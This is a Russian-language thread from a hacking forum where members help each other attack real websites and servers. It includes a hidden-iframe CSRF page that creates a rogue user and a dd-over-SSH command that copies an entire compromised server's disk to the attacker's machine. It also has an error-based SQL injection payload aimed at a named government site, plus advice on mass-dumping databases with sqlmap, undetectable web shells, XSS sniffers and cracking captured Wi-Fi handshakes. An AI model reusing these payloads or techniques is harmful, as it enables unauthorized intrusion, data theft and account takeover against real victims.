Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Редирект ты вряд ли сможешь упразднить, но оно и не нужно. CSRF обычно в ифрейм прячется, примерно так будет выглядеть:

    PHP:
    <html>
    <
    head>
    <
    title>CSRF</title>
    </
    head>
       <
    body onload='document.forms.csrf.submit();'>
         <
    form action="http://site/cp/newuser/" name="csrf" method="POST" target="iframe">
           <
    input type="hidden" name="login" value="hack">
           <
    input type="hidden" name="newp" value="hack">
           <
    input type="hidden" name="newp1" value="hack">
         </
    form>
         <
    iframe src="" style="display:none;" name="iframe" id="iframe"></iframe>
       </
    body>
    </
    html>
     
  2. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    294
    Likes Received:
    89
    Reputations:
    1
    Имеется root на сервере
    Code:
    root@server:# uname -a
    Linux server 4.4.0-79-generic #100-Ubuntu SMP Wed May 17 19:58:14 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
    
    root@server:# df -h
    Filesystem      Size  Used Avail Use% Mounted on
    udev            490M     0  490M   0% /dev
    tmpfs           100M   11M   89M  11% /run
    /dev/vda1        30G   18G   12G  60% /
    tmpfs           497M     0  497M   0% /dev/shm
    tmpfs           5.0M     0  5.0M   0% /run/lock
    tmpfs           497M     0  497M   0% /sys/fs/cgroup
    tmpfs           100M     0  100M   0% /run/user/0
    
    root@server:# lsblk -a
    NAME   MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
    vda    253:0    0  30G  0 disk
    └─vda1 253:1    0  30G  0 part /
    loop0    7:0    0       0 loop
    loop1    7:1    0       0 loop
    loop2    7:2    0       0 loop
    loop3    7:3    0       0 loop
    loop4    7:4    0       0 loop
    loop5    7:5    0       0 loop
    loop6    7:6    0       0 loop
    loop7    7:7    0       0 loop
    
    
    Подскажите как имея ssh сделать образ/backup удаленной машины (то есть всей системы/hdd)?
    И скачать налету упакованный образ/архив (при условии если места не хватит)
    В последствии поднять данный образ в VM
     
  3. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Как вариант, сделать образ диска, с сохранением на удалённую машину, через SSH:
    Code:
    dd if=/dev/vda | ssh [email protected] -p22 "cat > vda_image"
    
    А потом гуглить "dd image to vm" и пробовать заводить этот образ :)
     
  4. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    294
    Likes Received:
    89
    Reputations:
    1
    Ранее с таким не сталкивался, потому вопрос может быть очень глупым
    )))
    Выполняю это на удаленной машине, что бы сохранить файл на свой ПК (указывая его как удалённый)
    "cat > vda_image" я правильно понял что могу указать папку сохранения своего ПК, для примера: dd if=/dev/vda | ssh [email protected] -p22 "cat > /root/folder_on_my_computer/vda_image_file"
    Я верно понял?
    P.S> как узнать предположительный размер конечного файла?
    Дабы решить на какую удаленную лить (место не резиновое =) )
     
  5. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    смонтируй директорию(хоть корень) через sshfs
    Code:
    sshfs user@hostname:/remote/path /sshfs_local_folder
    
    и работай как с локальной системой, tar там или ещё чего, создать iso можно так
    Code:
    mkisofs -lJR -o output_image.iso sshfs_local_folder
    
    по идее должно работать
     
    _________________________
    crlf likes this.
  6. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Да, можно указать любой путь на удалённой машине. Судя по df -h /dev/vda1 имеет размер 30G, образ будет такого же размера. Можно ещё попутно жать gzip-ом, размер должен быть меньше.
     
    t0ma5 likes this.
  7. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Цветные, помогите
    Code:
    http://health.ri.gov/licenses/detail.php?id=248++1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 
     
  8. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Code:
    detail.php?id=248=0 group by mid(version(),rand(0)|0)having min(0)-- -
    Как вариант вывести через ошибку БД, но не забывай заключать оператор select в /*!select*/, там на него ругается!
     
  9. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Спасибо, а можешь любую таблицу вывести, а то я не оч понимаю этот синтекс, а так по твоему примеру буду пробовать разбираться. Спасибо.
     
  10. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    там всё что после /**/ как будто не уходит в запрос :(
    ?id=248/**/werwer - валидная страница
    ?id=248=0 group by mid(/*!select(version())*/,rand(0)|0)having min(0)-- - - запрос падает
     
    _________________________
    BabaDook likes this.
  11. GYK

    GYK New Member

    Joined:
    7 Aug 2017
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте, я бы хотел узнать об XSS уязвимостях, а именно как их использовать, если стоит фильтр, просто алерт работает а вот более сложные скрипты со сниффером - фильтруются, и еще на счет сниффера, есть ли такие, которые работают, когда жертва просто видит картинку, и нажатия не требуется, я в этом плохо разбираюсь, также на счет шелка, есть ли беспалевные, просто на какой бы хостинг я бы не ставил, тут же блокируют, или шелл просто ее работает, может хостинги сеть, на которых они не садятся какие-то?
     
  12. r1l

    r1l New Member

    Joined:
    19 Jan 2016
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Нашел жирный сайт, по после 200к(фул 1.3кк) строк слива очень падает скорость до нереальной
    Что можно предпринять, что бы хоть как то заставить сливаться быстрее?
     
  13. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    А чем сливаешь?
     
  14. r1l

    r1l New Member

    Joined:
    19 Jan 2016
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    sqlmap как и всегда
     
  15. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    DIOS - Dump In One Shot
     
  16. r1l

    r1l New Member

    Joined:
    19 Jan 2016
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    для "Union Base"
    у меня error base

    да и если бы уязвимость была union я бы и мапом наверное в один клик слил
    Может там шел можно как то залить, я ни разу этого не делал
     
  17. oposor

    oposor New Member

    Joined:
    16 Aug 2017
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Привет всем!
    Сразу извините за тупой вопрос.
    Мб я пишу не в ту тему. Вообщем проблема такова , есть сайт medstat.*uva.ru ( *t )который можно войти только через сеть
    поликлиники, а через любую другую сеть никак не могу вломиться,пробывал VPN,TOR,ПРОКСИ не помогает.
    Как войти на этот сайт?
     
    #2017 oposor, 16 Aug 2017
    Last edited: 16 Aug 2017
  18. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    Количество потоков(хинт)
     
  19. Xsite

    Xsite Member

    Joined:
    21 Jan 2010
    Messages:
    53
    Likes Received:
    5
    Reputations:
    0
    Ребят подскажите или помогите :D

    1. есть сайт , на нем скуля Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) , в post запросе
    2.Если начинать --dump , сыпятся куча ошибок и он не может сдампить даже пару строк (уменьшал увеличивал кол-во потоков ,делей ,запускал с ключом -o ) Все одно и тоже ,я думаю это из-за кол-во записей в таблице юзеров
    3. Стал смотреть --is-dba , оказалось false
    4. Чекнул Ip yf 3306 порт мускула ,но о5 же нет :D
    5.Нашел таблицу с админами , нашел пасс мыло и нейм ,но пасс судя по всему расшифровке не подлежит ,так как $P$BpL/N0jM5uZ.rjNf.dQXCJEfZ.D0FN/ , засунул на cmd5 ,тоже тишина , но вроде как форму логина для админов нашел ,но это тоже ничего не дает
    6. искал пхпмайадмин ,поиски ничего не дали

    Задача сдампить

    Вопрос: как ?)
     
    Hedorda likes this.
  20. VCL

    VCL New Member

    Joined:
    21 Dec 2015
    Messages:
    33
    Likes Received:
    4
    Reputations:
    0
    С андройда при помощи csploit наловил трафика и сохранил в pcap . Юзнул Wireshark и с помощью фильтра : wlan.fc.type_subtype == 0x08 || wlan.fc.type_subtype == 0x04 || eapol
    отделил от мусора .


    Дальше в мануале было сказано запустить Elcomsoft Wireless Security Auditor закинуть наш отсортированный файл и атаковать .

    Когда начинаю закидывать файл EWSA начинает ругаться , что файл либо не того формата либо в нем нет того что нужно .
    Вопрос что же я делаю неправильно ? =(